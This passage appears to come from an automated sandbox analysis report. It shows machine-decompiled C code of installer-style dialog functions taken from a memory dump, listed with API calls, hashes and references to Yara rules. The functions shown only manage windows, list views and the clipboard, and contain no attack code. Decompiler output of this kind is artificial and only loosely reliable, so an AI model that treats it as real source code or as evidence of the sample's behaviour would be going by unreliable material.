						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

APIs

GetDlgItem.USER32 ref: 00404CED
GetDlgItem.USER32 ref: 00404CFA
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
LoadImageA.USER32 ref: 00404D60
SetWindowLongA.USER32 ref: 00404D7A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
SendMessageA.USER32 ref: 00404DB6
SendMessageA.USER32 ref: 00404DC2
SendMessageA.USER32 ref: 00404DD2
DeleteObject.GDI32(00000110), ref: 00404DD7
SendMessageA.USER32 ref: 00404E02
SendMessageA.USER32 ref: 00404E0E
SendMessageA.USER32 ref: 00404EA8
SendMessageA.USER32 ref: 00404ED8

Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314

SendMessageA.USER32 ref: 00404EEC
GetWindowLongA.USER32 ref: 00404F1A
SetWindowLongA.USER32 ref: 00404F28
ShowWindow.USER32(?,00000005), ref: 00404F38
SendMessageA.USER32 ref: 00405033
SendMessageA.USER32 ref: 00405098
SendMessageA.USER32 ref: 004050AD
SendMessageA.USER32 ref: 004050D1
SendMessageA.USER32 ref: 004050F1
ImageList_Destroy.COMCTL32(?), ref: 00405106
GlobalFree.KERNEL32 ref: 00405116
SendMessageA.USER32 ref: 0040518F
SendMessageA.USER32 ref: 00405238
SendMessageA.USER32 ref: 00405247
InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
ShowWindow.USER32(?,00000000), ref: 004052BF
GetDlgItem.USER32 ref: 004052CA
ShowWindow.USER32(00000000), ref: 004052D1

Strings

M, xrefs: 00404E90
Nw, xrefs: 00405277
N, xrefs: 00404F71
, xrefs: 004052A9

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$Nw
API String ID: 2564846305-1234331240
Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

APIs

GetDlgItem.USER32 ref: 00405511
GetDlgItem.USER32 ref: 00405520
GetClientRect.USER32 ref: 0040555D
GetSystemMetrics.USER32 ref: 00405564
SendMessageA.USER32 ref: 00405585
SendMessageA.USER32 ref: 00405596
SendMessageA.USER32 ref: 004055A9
SendMessageA.USER32 ref: 004055B7
SendMessageA.USER32 ref: 004055CA
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
ShowWindow.USER32(?,00000008), ref: 00405600
GetDlgItem.USER32 ref: 00405621
SendMessageA.USER32 ref: 00405631
SendMessageA.USER32 ref: 0040564A
SendMessageA.USER32 ref: 00405656
GetDlgItem.USER32 ref: 0040552F

Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314

GetDlgItem.USER32 ref: 00405672
CreateThread.KERNEL32 ref: 00405680
CloseHandle.KERNEL32(00000000), ref: 00405687
ShowWindow.USER32(00000000), ref: 004056AA
ShowWindow.USER32(?,00000008), ref: 004056B1
ShowWindow.USER32(00000008), ref: 004056F7
SendMessageA.USER32 ref: 0040572B
CreatePopupMenu.USER32 ref: 0040573C
AppendMenuA.USER32 ref: 00405751
GetWindowRect.USER32 ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageA.USER32 ref: 004057C6
OpenClipboard.USER32(00000000), ref: 004057D6
EmptyClipboard.USER32 ref: 004057DC
GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
GlobalLock.KERNEL32 ref: 004057EF
SendMessageA.USER32 ref: 00405803
GlobalUnlock.KERNEL32(00000000), ref: 0040581C
SetClipboardData.USER32 ref: 00405827
CloseClipboard.USER32 ref: 0040582D

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
ShowWindow.USER32(?), ref: 00403E56
DestroyWindow.USER32 ref: 00403E6A
SetWindowLongA.USER32 ref: 00403E86
GetDlgItem.USER32 ref: 00403EA7
SendMessageA.USER32 ref: 00403EBB
IsWindowEnabled.USER32(00000000), ref: 00403EC2
GetDlgItem.USER32 ref: 00403F70
GetDlgItem.USER32 ref: 00403F7A
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
SendMessageA.USER32 ref: 00403FE5
GetDlgItem.USER32 ref: 0040408B
ShowWindow.USER32(00000000,?), ref: 004040AC
EnableWindow.USER32(?,?), ref: 004040BE
EnableWindow.USER32(?,?), ref: 004040D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
EnableMenuItem.USER32 ref: 004040F6
SendMessageA.USER32 ref: 0040410E
SendMessageA.USER32 ref: 00404121
lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
ShowWindow.USER32(?,0000000A), ref: 0040428E

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C, Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x77ec4e
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
GetDlgItem.USER32 ref: 004044DB
SendMessageA.USER32 ref: 004044F9
GetSysColor.USER32(?), ref: 0040450A
SendMessageA.USER32 ref: 00404519
SendMessageA.USER32 ref: 00404528
lstrlenA.KERNEL32(?), ref: 0040452B
SendMessageA.USER32 ref: 0040453A
SendMessageA.USER32 ref: 0040454F
GetDlgItem.USER32 ref: 004045B1
SendMessageA.USER32 ref: 004045B4
GetDlgItem.USER32 ref: 004045DF
SendMessageA.USER32 ref: 0040461F
LoadCursorA.USER32 ref: 0040462E
SetCursor.USER32(00000000), ref: 00404637
LoadCursorA.USER32 ref: 0040464D
SetCursor.USER32(00000000), ref: 00404650
SendMessageA.USER32 ref: 0040467C
SendMessageA.USER32 ref: 00404690

Strings

N, xrefs: 004045CD
Nw, xrefs: 0040445C
B, xrefs: 0040463B

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
